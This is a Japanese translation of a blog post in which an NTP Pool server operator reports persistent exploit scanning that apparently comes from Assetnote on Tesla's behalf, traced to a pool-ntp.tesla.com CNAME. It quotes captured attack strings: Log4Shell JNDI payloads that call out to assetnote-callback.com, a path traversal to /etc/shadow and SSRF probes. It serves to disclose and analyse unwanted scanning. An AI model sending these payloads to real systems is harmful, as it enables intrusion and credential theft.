セキュリティ
私はTesla, Inc.によってサイバー攻撃を受けています
I'm being cyberattacked by Tesla, Inc (dreamstation.systems)
要約
筆者のNTPサーバーが、Tesla社に関連するIPアドレスからの継続的なスキャンとエクスプロイト攻撃を受けていることが判明しました。これは、Tesla社が公開しているドメイン名がNTP PoolのサーバーIPにCNAMEされていることが原因で、Tesla社の攻撃サーフェス管理ツールが筆者のサーバーをTeslaの資産と誤認している可能性が高いと推測されています。筆者はTesla社に連絡しましたが、現時点では攻撃は続いています。
全文翻訳
私はTesla, Inc.によってサイバー攻撃を受けています。
2026-09-13
IPv4インターネットのダークダンジョンでは、ドライブバイ・スキャナートラフィックの砲撃や、時折奇妙にしつこい攻撃者に晒されるのは珍しいことではありませんが、nginxのログを調べていると奇妙なことに気づきました。
pool-ntp.tesla.comからのホストまたはリファラーヘッダーを付けて、Assetnoteのユーザーエージェントを使い、SSRFをAssetnoteコールバックURLに試みる、3つの特定のIPアドレスからの執拗な攻撃トラフィックでした。
35.168.63.24 - - [13/Sep/2026:01:14:31 -0700] "GET /?a=%3Cscript%20src=${jndi${:-:}ldap${:-:}//waf6.${date:MM-dd-yyyy}.pool-ntp.tesla.com.log4j.assetnote-callback.com/}>alert()%3C%2Fscript%3E HTTP/1.1" 299 817 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 ${jndi${:-:}ldap${:-:}//waf6.${date:MM-dd-yyyy}.pool-ntp.tesla.com.log4j.assetnote-callback.com/}" host=pool-ntp.tesla.com
トラフィックは、54.165.75.96、35.168.63.24、52.44.200.251という3つの特定のスキャナーから来ていました。これらすべてはAmazon Web Services AS (AMAZON-AES) に属しています。
Assetnoteは、現在マーケティング資料ではSearchlight Cyberとして知られている正規の攻撃サーフェス管理ツールであり、顧客の資産に対して自動チェックを実行するために、このような継続的な脅威露出スキャナーを使用しています。
これが実際のAssetnoteトラフィックであると仮定すると(彼らは実際にAWSを使用しているので、それは確認できます)、彼らは私をTeslaの内部資産と間違えているに違いありません。
これがどのように起こったか
Teslaはpool-ntp.tesla.comをpool.ntp.orgへのCNAMEとして公開しています。pool.ntp.orgはNTP Poolであり、私が参加しているボランティアNTPサーバーのラウンドロビンです。(余談ですが、彼らは自身のCNAMEをtesla.comの下で使用するのではなく、ベンダーゾーンを使用すべきです。)
推測:Assetnoteはtesla.comの下で見つかるすべてを収集し、pool-ntp.tesla.comを含みます。これはpool.ntp.orgにCNAMEされ、私のマシン(67.215.249.229)に解決される可能性があります。資産インベントリはこれをTesla資産として保存し、私のような見知らぬ人にエクスプロイトを投げつけ始めます。
私はこの件についてTeslaにメールしましたが、まだ返信はありません。
Hi,
Teslaに脆弱性があるわけではなく、何も求めているわけではありませんが、意図せず迷惑をかけている可能性があることをお知らせしたかったのです。
私のサーバーはNTP Poolのメンバーです。過去約2日間、あなたのスキャンホスト2つ(<54.165.75.96>と<35.168.63.24>)から、UA <Assetnote/1.0.0 (ExposureScan)>、多くのテンプレート化されたエクスプロイトペイロード付きで、約8,000件のリクエストを受け取りました。使用されたすべてのペイロードは、ターゲットホスト名として<pool-ntp.tesla.com>を使用していました。
内部サブドメインがあり、それがNTP Poolメンバーサーバーにラウンドロビンで解決されると推測されますが、その大多数はTeslaのものではありません。あなたの資産検出は、<pool-ntp.tesla.com>が解決できるすべてのIPをアクティブスキャンの対象として意図せず含んでいるようです。
ここには害はありませんが、**見知らぬ人のIPにエクスプロイトを投げかけている**ことを警告したかったのです。
必要であれば、詳細なログを共有できます。
Robin
dreamstation.systems / 67.215.249.229
彼らのトラフィック
彼らは私に対して、パス・トラバーサル、ウェブシェルアップロード、ソフトウェア内部のプロービング、WordPressやその他のCMS管理エンドポイントのプロービング、SSRF、Log4Shellなど、さまざまなエクスプロイトを試みました。
コールバック試行もありました。Log4ShellおよびText4Shell検出のために、989件のリクエストがassetnote-callback.comホスト名を埋め込み、SSRFのために114件がcanary.assetnotessrf.comを名前付けしていました。
GET /solr/admin/collections?action=${jndi:ldap://solr.${hostName}.${date:MM-dd-yyyy}.pool-ntp.tesla.com.log4j.assetnote-callback.com/a}
説明がつかない面白いことが一つあります。15件のリクエストはlogin.solarcity.comというホストヘッダーを付けており、すべてGET /(S(x))/b/(S(x))in/System.Web.Mvc.dllをリクエストしていました。これは、/b/(S(x))in/を/bin/に解決しようとするASP.NETのトリックだと思います。
ホストヘッダー以外の興味深い情報も見つけました。
リファラーヘッダー、URL、クエリ文字列をスキャンすると、テンプレート自体に埋め込まれたホスト名が見つかります。
GET /calendars/admin@lowlevelaccess.jlg.com/calendar/../../../mail/lowlevelaccess.jlg.com/admin/.x-attachment-1-y/new/../../../../../../../../../etc/shadow
その他、第三者のホスト名としてservicemcdonalds.com、saferas.com、rsmafghanistan.af、enrichcs.com.au、escience2010.org、al-forno.com.au、disneyfineart.comなどが見られました。
RFC 1918アドレスも、あるプローブのリファラーに現れました。
GET /internal/v2/config/mps_secret/ADM_SESSIONID
Referer: http://192.168.178.222/admin_ui/mas/ent/html/main.html
スキャナーは、理由もなくすべてのポートでHTTPで通信しようとします。私のSSH、Postfix、Dovecotには大量のジャンクトラフィックが届いています。
9月8日、pool-ntp.tesla.comホストに対して、非標準のステータスコート299(スキャナーログを読む人間の注意を引くことを期待して)で応答を開始しました。すべてのパスにこの通知を本文として表示しました。
# これはTeslaのインフラではありません!これはホビイストのNTP、Web、およびその他のサーバーです。
# ここ数日間、Assetnoteのスキャンホスト2つ(54.165.75.96と35.168.63.24)からpool-ntp.tesla.comホスト宛に大量のリクエストを受け取っています。
# pool-ntp.tesla.comはpool.ntp.orgにCNAMEされ、これは数千のボランティアNTPサーバーにラウンドロビンで解決されます。あなたのスキャナーは私のサーバーに固執しているようです。
# あなたは私に害を与えていませんが、見知らぬ人のIPにエクスプロイトを投げかけています。
# VulnerabilityReporting@tesla.comにメールしました。
# 必要であれば、robin@dreamstation.systemsにメールを返信していただければ、詳細なログを提供できます。
残念ながら、これまでのところ行動は変わっていないようです。
彼らの攻撃はどれも成功していません。これは誇りに思います。
8月21日以降、Assetnoteホストから50,000件以上のリクエストを受け取っています。トラフィックはまだ止んでいません。後でこの投稿を更新します。(はい、IPアドレスをファイアウォールでブロックすることもできますが、観察するのは非常に面白く、Teslaの誰かに何が起こっているのかを知ってもらいたいのです。)
彼らはプール全体に対してこれを行っているのでしょうか?
NTP Poolサーバーオペレーターのコミュニティボードに、NTPサーバーと同じIPでWebサーバーを実行している人が他にこの状況を見ているか尋ねました。
オペレーターの一人、Matt Nordhoffは、8月15日から同様の状況を見ていると述べています。
$ sudo rg -zFI pool-ntp.tesla.com access.log* | awk '{print $1}' | sort | uniq -c | sort -gr | head
9126 54.165.75.96
7461 35.168.63.24
6123 52.44.200.251
11 64.227.103.50
6 146.190.142.16
4 3.101.230.148
3 3.88.188.142
3 3.101.216.68
2 54.213.2.72
2 54.202.10.40
しかし、他の誰も何も言っていません。
彼らは毎回pool-ntp.tesla.comを再解決し、地理的なマジックで到達できるすべてにアクセスしているのか、それとも少数のプールIPを収集してそれらを叩いているだけなのか、疑問に思っています。